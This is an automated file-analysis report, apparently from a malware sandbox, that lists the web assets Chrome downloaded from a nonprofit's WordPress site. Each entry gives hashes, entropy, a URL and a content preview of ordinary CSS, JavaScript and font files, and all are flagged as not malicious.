                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={};const e=elementor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-sett
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10260), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):10260
                                                                                                                                                                                                                              Entropy (8bit):4.345053278095821
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Vf0HhGhmdGtlDNURY5hs64Wcg3LNB7uo03z5VN:VAhGhmdG/NUkhs64Wcg3LNB7uo03z5VN
                                                                                                                                                                                                                              MD5:F9A4D42BF66491DD2E49CD5A425BFC4E
                                                                                                                                                                                                                              SHA1:3CFE595AB53EDF4AD7BA7B66BE50442521F78DD6
                                                                                                                                                                                                                              SHA-256:9BC52B3C4E9973D64BAA482F332ED895F80D0CD2BE37E6A49BF1A2E831EB5AC9
                                                                                                                                                                                                                              SHA-512:92781FB595E1E551DC4425744692B61A1624CCFDD1C668842CDDBA252303A9D97F713B4CCAA828E196ADD56D10D912871B43AEF3228A574EEF4140E96858A0AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css
                                                                                                                                                                                                                              Preview:.elementor-element,.elementor-lightbox{--swiper-theme-color:#000;--swiper-navigation-size:44px;--swiper-pagination-bullet-size:6px;--swiper-pagination-bullet-horizontal-gap:6px}.elementor-element .swiper-container .swiper-slide figure,.elementor-element .swiper .swiper-slide figure,.elementor-lightbox .swiper-container .swiper-slide figure,.elementor-lightbox .swiper .swiper-slide figure{line-height:0}.elementor-element .swiper-container .elementor-lightbox-content-source,.elementor-element .swiper .elementor-lightbox-content-source,.elementor-lightbox .swiper-container .elementor-lightbox-content-source,.elementor-lightbox .swiper .elementor-lightbox-content-source{display:none}.elementor-element .swiper-container .elementor-swiper-button,.elementor-element .swiper-container~.elementor-swiper-button,.elementor-element .swiper .elementor-swiper-button,.elementor-element .swiper~.elementor-swiper-button,.elementor-lightbox .swiper-container .elementor-swiper-button,.elementor-lightbox .
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 71896, version 4.393
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):71896
                                                                                                                                                                                                                              Entropy (8bit):7.996746194687547
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:1536:tA4xrPyfyECsyz2wCjYfhO/ORzc7erabg5Z06GEQMo:t3jayEC/2/OI/gcq+bg5C6G7
                                                                                                                                                                                                                              MD5:E6CF7C6EC7C2D6F670AE9D762604CB0B
                                                                                                                                                                                                                              SHA1:97E438CC545714309882FBCEADBF344FCADDCEC5
                                                                                                                                                                                                                              SHA-256:7DACF83F51179DE8D7980A513E67AB3A08F2C6272BB5946DF8FD77C0D1763B73
                                                                                                                                                                                                                              SHA-512:DD945FACE918EDF20B7283B7416AE7B3735269945E3F3E379E770425024C1DE1FCDC7CFB952381D295D0D1F58C8AB191FD29030F2051D10501557BD7BFBE3658
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/fonts/fontawesome-webfont.woff2?v=4.3.0
                                                                                                                                                                                                                              Preview:wOF2..............T....y........................?FFTM.. .`........P..K.6.$........ ..|..L?webf.[8....m;.t.........c6.....>.S.8.{...]?....?=i..%...P......f85J.0..u....f...eB.\...E.l.....Aw..6...f..F...0l...M.`;i.O.U....k."=........./6../eX.q..vf{].-.o,.5.&.}.L..:...0.{.e..V*3~....1Mh.M4:9jG..B......K...Y..2c.=..@..V*+..=.g.;..%.q,..sYF.oj..D..t....wZ1t.S\...L.....k(...1CK.z.Z!.iM....zH.....D[gcN........E.~.j.VD..[../..TD..........<@.j.cl...}.s.g4...F.f.F..;...H...E...P.#I..1{..X....]..ps.........^(.S........N...1S.....$@..T.\..k"G". V.Z..gf?.{..D..8f............9....g.i.\..... .".u^.+....%...u.S...!.J.Y5.{k..j..J.....i....!..t."...v...C..0...p..as..g.3.....~3/.3.<s.....K...u..t.n.......tS.|..].~..I* ...I......7y..EL@.B.%....TTT.zu\.....eb.bM..-f.?.... .Os$/.Y....u..7..F.Q5.F..........%.......b`...o....o....c...t..@7.*.{HK...P..9..(.*[..&&..{...W.0e.....8.v.h.a..-..%./..wgg.|.\E.x.^;H...D..(.J&......D.mo}..0.i...g#.i{....4.3f.;.m.......v{GbP...T.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):13482
                                                                                                                                                                                                                              Entropy (8bit):5.28370367369775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:3yiUGUQ/cHkN/MpqtNMCC/Rilm6Udn3LzoJphH8uClD2tFtJ7byTwtF:3yiUGUQ/cEN/MpqDMCC/MA6cn3L0JplN
                                                                                                                                                                                                                              MD5:6CFE4FC46FDAD99CDC663A9640600858
                                                                                                                                                                                                                              SHA1:1962C34D2104F35CDBD48A674B7B22FA6E8831DF
                                                                                                                                                                                                                              SHA-256:BBD90E143917692A4337DCDF0F9BDEB628FF4A3F7C3D9B3230B4B5F3DE504C53
                                                                                                                                                                                                                              SHA-512:ACFCD4E90697F97E86F62EF097940759661D085842476441CE0AE62BA0D6201271E420F5B82FF2FBBA0D6C9F214478B60D1DCF281FC993DC17BE3139BA2CF476
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.js
                                                                                                                                                                                                                              Preview:/**handles:wp-hooks,wp-i18n**/../*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>S,addAction:()=>m,addFilter:()=>p,applyFilters:()=>k,createHooks:()=>h,currentAction:()=>w,currentFilter:()=>I,defaultHooks:()=>f,didAction:()=>O,didFilter:()=>j,doAction:()=>b,doingAction:()=>x,doingFilter:()=>T,filters:()=>z,hasAction:()=>v,hasFilter:()=>y,removeAction:()=>A,removeAllActions:()=>F,removeAllFilters:()=>g,removeFilter:()=>_});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers,
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16214)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):16471
                                                                                                                                                                                                                              Entropy (8bit):5.214012011088674
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:IbgmUJbiKneTT4bHZ+SKbnxup/a2AMQfHff71eesedOJ9A5Pz+c3At2/6:IdUbeTMbHZ+Vnh2AVfHfA4XYz
                                                                                                                                                                                                                              MD5:A2431BC290CF34E330E11EC4CFCE1247
                                                                                                                                                                                                                              SHA1:32A53342901FEF5F4F4DBB26A555E730F84437A4
                                                                                                                                                                                                                              SHA-256:C57E64FCB72BDDAFA9C38DE574441C3E69AC6C961DF96B0CAD34DA83658BD196
                                                                                                                                                                                                                              SHA-512:87AEF045472DB25020FAEAD697EC02813BA38D4E313CAF437B4CA5CADBB7A7495805AC0B74E5DE60CD84CCECAB290B76D003EB1FADFCDAA70E650A597658ADA9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css
                                                                                                                                                                                                                              Preview:/**. * Swiper 8.4.5. * Most modern mobile touch slider and framework with hardware accelerated transitions. * https://swiperjs.com. *. * Copyright 2014-2022 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: November 21, 2022. */.. @font-face{font-family:swiper-icons;src:url('data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNgYfzCOIGB
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24443), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):54702
                                                                                                                                                                                                                              Entropy (8bit):5.29120585163207
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:/boHn8/VstmeOO53rV6U69IdtjcJtyva6nXYtqt9JtQtI7Tays+EmnRuGpzPqNYU:VO3r5W0FYczJS2PtmYVi
                                                                                                                                                                                                                              MD5:4DD99DAB5EA4B4599B19816252B7F172
                                                                                                                                                                                                                              SHA1:E6C1D6C317D32CB410EFECF4B8575E2C22D92E22
                                                                                                                                                                                                                              SHA-256:0E7C4B84651E399B437F6D8EBEE3F2AEB6A783D27CB27C2EE7527E9F510455E7
                                                                                                                                                                                                                              SHA-512:5A9E6D543E33185AC1420913D3C0EA99F107F7E17AA06FE594FF92ADE84A995B00286A376ED0F5D0674383216DD3C1B669BFFF8E1BFD2FEF68A0AE7D09C22430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:cookie-law-info,spb-frontend-js-min,imagesLoaded,jquery-viewports,jquery-smartresize**/..CLI_ACCEPT_COOKIE_NAME="undefined"!=typeof CLI_ACCEPT_COOKIE_NAME?CLI_ACCEPT_COOKIE_NAME:"viewed_cookie_policy",CLI_PREFERENCE_COOKIE="undefined"!=typeof CLI_PREFERENCE_COOKIE?CLI_PREFERENCE_COOKIE:"CookieLawInfoConsent",CLI_ACCEPT_COOKIE_EXPIRE="undefined"!=typeof CLI_ACCEPT_COOKIE_EXPIRE?CLI_ACCEPT_COOKIE_EXPIRE:365,CLI_COOKIEBAR_AS_POPUP="undefined"!=typeof CLI_COOKIEBAR_AS_POPUP&&CLI_COOKIEBAR_AS_POPUP;var CLI_Cookie={set:function(e,t,i){var o="",n,n,n,i;!0===Boolean(Cli_Data.secure_cookies)&&(o=";secure"),n=i?((n=new Date).setTime(n.getTime()+24*i*60*60*1e3),"; expires="+n.toGMTString()):"",document.cookie=e+"="+t+o+n+"; path=/",i<1&&(host_name=window.location.hostname,document.cookie=e+"="+t+n+"; path=/; domain=."+host_name+";",1!=host_name.indexOf("www")&&(i=host_name.replace("www",""),document.cookie=e+"="+t+o+n+"; path=/; domain="+i+";"),host_name=host_name.substring(host_name.l
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21464
                                                                                                                                                                                                                              Entropy (8bit):5.303481082929494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                                                                                                                              MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                                                                                                                              SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                                                                                                                              SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                                                                                                                              SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1924)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):70428
                                                                                                                                                                                                                              Entropy (8bit):5.469499541611815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:ks2uk/OvnnsqfxBGTFrGvheC7nSZkBKf7XIuLs5Wsi4VU:A/GnfkyNnSBV5R
                                                                                                                                                                                                                              MD5:1A90FFCED473947FED02997FB89F1636
                                                                                                                                                                                                                              SHA1:3FBCA9786523A24BB9FA157B93A2A570BD7665B3
                                                                                                                                                                                                                              SHA-256:230FACBC81B146C0992A734F6B1A47DF5E051302A2C5B0412020A411A49F3A14
                                                                                                                                                                                                                              SHA-512:B43C09A0EC93BB859C8C1F024C4642704ECF6BC7F24592EEE7DBFC2E4A93A2E8075AABFAAAF5401996F56123C210DBDB156CAF8DD9D9B1EB412D1AE4019D24AB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://stats.wpmucdn.com/analytics.js
                                                                                                                                                                                                                              Preview:/*!!. * Piwik - free/libre analytics platform. *. * JavaScript tracking client. *. * @link https://piwik.org. * @source https://github.com/matomo-org/matomo/blob/master/js/piwik.js. * @license https://piwik.org/free-software/bsd/ BSD-3 Clause (also in js/LICENSE.txt). * @license magnet:?xt=urn:btih:c80d50af7d3db9be66a4d0a86db0286e4fd33292&dn=bsd-3-clause.txt BSD-3-Clause. */.;if(typeof window.JSON==="object"&&typeof window.JSON.stringify==="function"&&typeof window.JSON.parse==="function"){JSON_PIWIK=window.JSON}else{(function(){var a={};./*!! JSON v3.3.2 | http://bestiejs.github.io/json3 | Copyright 2012-2014, Kit Cambridge | http://kit.mit-license.org */.(function(){var c=typeof define==="function"&&define.amd;var e={"function":true,object:true};var h=e[typeof a]&&a&&!a.nodeType&&a;var i=e[typeof window]&&window||this,b=h&&e[typeof module]&&module&&!module.nodeType&&typeof global=="object"&&global;if(b&&(b.global===b||b.window===b||b.self===b)){i=b}function j(ab,V){ab||(ab=i.Object()
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (664)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):704
                                                                                                                                                                                                                              Entropy (8bit):4.637196339541154
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:UoCFsP9YsrYstapst97srYstSpstaKMEzjsHpstaustGjsHpstaustRflsgst5EM:BGi9nTaKD0yXBrY
                                                                                                                                                                                                                              MD5:57515903C54A52A5DCC60A5CBFA788D2
                                                                                                                                                                                                                              SHA1:63C5473D82E66EAB8327D0749D40DAD1CB8838B2
                                                                                                                                                                                                                              SHA-256:8689070C5C1F1FAEF3710A98CDB1C1DB37F98F074ADCB765367B39209B77C854
                                                                                                                                                                                                                              SHA-512:E87A58AE81E18CDD11FC7B7ED69B10DD94E4627E8E6AA57A817909889CF3BB3C05D9905D93BE13C84B3CBE18DCFEE934AD8884EA0ABD41ED26E702733D56D2D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */..elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#69727d;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#69727d;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1324)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1364
                                                                                                                                                                                                                              Entropy (8bit):4.536219133942167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:BGi9QzqNkftlKN4/f444+kf4+64+zVf4+zU7WAfUhI2fnco:BJQze6tlKNsdN6N6Nz5NzU7WOSIQB
                                                                                                                                                                                                                              MD5:84BA9333361DEFBDA0A9B500548C98EA
                                                                                                                                                                                                                              SHA1:1DA8320CB5ADBB65911CC31E98732FAD03C126C8
                                                                                                                                                                                                                              SHA-256:E95FD55037ADF8C8CFBA100FA4577C205DE8589846E8D13D2E84ACCA1276029E
                                                                                                                                                                                                                              SHA-512:971A3B1ED588A860F91AA9FB82150068D26EB3378A80E136437E29FC4DDA612697F4C55EE2E283E1A2726ED393DF9BD5A2B16F24F73EB21B509ECF238D4CEBAA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/css/widget-spacer.min.css
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */..elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));--align-self:var(--container-widget-align-self,initial);--flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container{height:100%;width:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}.e-con-inner>.elementor-widget-spacer.elementor-widget-empty,.e-con>
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18528, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):18528
                                                                                                                                                                                                                              Entropy (8bit):7.986144809790857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:GfKgd95SEpz3OWIliXQccyFd+l42fxlU6CwFZXqd:Gz5Rb1KyCG2fxlawFUd
                                                                                                                                                                                                                              MD5:F2F8EE068D62E4B12CB8D0C786056FE5
                                                                                                                                                                                                                              SHA1:F8B3D7C478C32C33D7DF53DA576AFA01E957DEA7
                                                                                                                                                                                                                              SHA-256:84033C7E01609647B00C2997CBEA3A74D6B6228B1BABAE60BB19BFB704247543
                                                                                                                                                                                                                              SHA-512:245BA79672C205AE97CD63D73492414508869854086A213D761684E262B9E0603B9FFA4E255941FD6F06A40CA1ECB7F18D99EE29763C3247DD41D15DFCDEACD2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/css/fonts/lora-v16-latin-700.woff2
                                                                                                                                                                                                                              Preview:wOF2......H`.......<..H...........................X..H....`?STATD..r.....`.(..`..6.$..,. ..N. .....5.&........GQ..Q.p.d..)I......iU..."H.E..,e.y..e...>....n..|..Rv^.)..80...&QI.L...2`Y..\.u.U.m.+.<_................._.#.'.u[...LD6.g.8.5...m...RRa.rI.....U.?"rx~n.....f.D../a....QB.;+0........11.K...{~.{_.!..pOD3K.h".x...#..L;....,..|a(cY.<r..s..>4.1....u;...a.t7D...8!...!.{.f..5U.PLEl%........}$.X....%&]......qq.....H'zg;i.'5......`...........a...v.4Q,...F....KSk..._cZ[........1</@j.2...P....m.....f.f..R.F..D..$4/.....3..~.C](>].n`...]......C..<1........R.....u....9..I..."...[..6.o..6....B..h...6I....%8.........$.... (...0.7Z..>.e.....S.K....A...].....ovNmMmo..y..O8B..{.w...!........?9....*DM....=.)......gOv.qB..hD..!.Q..Q..z.9......"6. A.T...*.u.b..&x....-.....$C.?%.....u.H..))"'G...^(bdF,,..... ..T.H...P!R..)U.T.CZ.!.:..]H.~d.(2n..3.,..Yb..Oq..P.B.N...a......". ..W....'.........lo......*..k.Kl..........0.#....#..P......xS!....t.of.3.i@?:.=.......
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2710)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):240605
                                                                                                                                                                                                                              Entropy (8bit):5.551901997222276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:OJEEXg48UXt4510PIUCM7/6fSnJJVh6HGJj0h6btPzuPbRvYfYs:O843Xt4EXhUGJj0h6b9kbRZs
                                                                                                                                                                                                                              MD5:2357C714763C2FC533770C071225F0FD
                                                                                                                                                                                                                              SHA1:D7311B1CECF4EBFBD3FCD61E1F13A602D21E40F2
                                                                                                                                                                                                                              SHA-256:42CC64AFF7093D5DAEB8BB2AF526E3B764C428B09A4E832F2B25F2D8AC769BF0
                                                                                                                                                                                                                              SHA-512:2CB16DFEC49E5124CC7BB8F9811BD4AF2BFED2CADEBF5AA659F6928E63C88FFC8599731286AA74F63D794D443F1D4F330CA098D581FBFFF023CC7C68BA962675
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-26451691-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__aev","vtp_setDefaultValue":false,"vtp_varType":"URL","vtp_component":"IS_OUTBOUND","vtp_affiliatedDomains":"tacinc.org"},{"function":
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (676), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):676
                                                                                                                                                                                                                              Entropy (8bit):4.515917734864143
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:wYsBustostttsBustostywAps7O2zQW+osBustostm0sBustostIshGJ+csBustg:qJ1iO2c3QGJ6GJv0GJam
                                                                                                                                                                                                                              MD5:5CB1765647983B6EA1F0F60347333C11
                                                                                                                                                                                                                              SHA1:3B2A6A5FB8A5F49AF1140B68C75CF5B4360CA0FF
                                                                                                                                                                                                                              SHA-256:48368555FE73B0AFAE94F48D85A3F32B999731F82B4D413149C1710C07AF28F6
                                                                                                                                                                                                                              SHA-512:386986D80E4340B3262FB986589A5B90DDCBA2A2AD6A0E78F1EA2EEAC372FA2DF371BACAC0554A6B6E13424F406B50837D0496F1A47BBBA463E0A53416E1256E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/elementor/css/post-815.css
                                                                                                                                                                                                                              Preview:.elementor-815 .elementor-element.elementor-element-3b9fc58{padding:0px 0px 0px 0px;}.elementor-815 .elementor-element.elementor-element-14a6744 > .elementor-widget-container{border-style:solid;border-width:1px 1px 1px 1px;border-color:#F1F1F1;border-radius:5px 5px 5px 5px;}.elementor-815 .elementor-element.elementor-element-14a6744{text-align:center;}.elementor-815 .elementor-element.elementor-element-3fcc156 .elementor-icon-list-icon{width:14px;}.elementor-815 .elementor-element.elementor-element-3fcc156 .elementor-icon-list-icon i{font-size:14px;}.elementor-815 .elementor-element.elementor-element-3fcc156 .elementor-icon-list-icon svg{--e-icon-list-icon-size:14px;}
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2961), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):149599
                                                                                                                                                                                                                              Entropy (8bit):5.33687774248419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:zD2IQWttqCCQnpOK7IerSDzrGIZtwde8frOidw:zdlqCCwOoU
                                                                                                                                                                                                                              MD5:9AAE0F88C0D8ECE5FC32600389C2391A
                                                                                                                                                                                                                              SHA1:F0733FAAEC14D831E9D4E113BBC1003D85CF8F4C
                                                                                                                                                                                                                              SHA-256:892E6C9BEB61F5513AE8446BB0D7FDE3502B207A5CF23ED20A340183348C90B9
                                                                                                                                                                                                                              SHA-512:0E8AD9297255A3E61898F27AC462BCBC36C23F863E7B936B4A11AFDFC15CDA56A65B30E057D5B4F13DF2953EE4BE1B179473C86105CC8CC56440B81BE6F0686A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/
